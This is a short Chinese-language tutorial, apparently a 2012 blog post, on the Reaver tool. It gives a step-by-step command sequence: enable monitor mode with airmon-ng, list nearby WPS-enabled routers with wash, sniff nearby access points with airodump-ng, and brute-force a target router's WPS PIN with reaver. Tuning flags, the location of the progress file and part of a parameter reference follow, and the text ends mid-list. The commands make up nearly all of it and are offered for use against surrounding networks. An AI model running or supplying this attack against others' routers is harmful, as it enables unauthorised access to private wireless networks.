2024年3月25日发(作者:)

Reaver基本命令参数详解及应用

2012-10-04 16:39:16| 分类: PC_net | 标签: |字号大中小 订阅

Reaver基本命令参数

XiaoPanOS下:

选择“终端”输入sudo thunar

这里是为了取得超级权限,选择系统文件-usr-local-ect-reave

ifconfig –a //确认你用哪一个网卡WLAN0或WLAN1

airmon-ng start wlan0 //开启监听模式

wash –i mon0 –C //查看开启wps的无线路由器

airodump-ng mon0 //查看周边AP信息(抓包)

reaver –i mon0 –b MAC –a –S –vv –d 3 –t 3 //开始穷举PIN码

reaver –i mon0 –b MAC –a –S –vv –d 0 //加快速度为1秒

reaver –i mon0 –b MAC –a –S –vv –p xxxx //从前4位PIN码开始

reave的进度表文件保存在:

1.3版:/etc/reaver/MAC地址.wpc

1.4版:/usr/local/etc/reaver/MAC地址.wpc

CDliunx下:

选择“终端”输入sudo thunar

这里是为了取得超级权限,选择系统文件-usr-local-ect-reaver-

reaver必需的参数:

-i, --interface=wlan Name of the monitor-mode interface to use //监视模式接

口使用的名称

-b, --bssid=mac BSSID of the target AP //目标AP的SSID

reaver可选参数:

-m, --mac=mac MAC of the host system //主机系统的MAC

-e, --essid=ssid ESSID of the target AP //目标AP的ESSID

-c, --channel=channel Set the 802.11 channel for the interface (implies -f)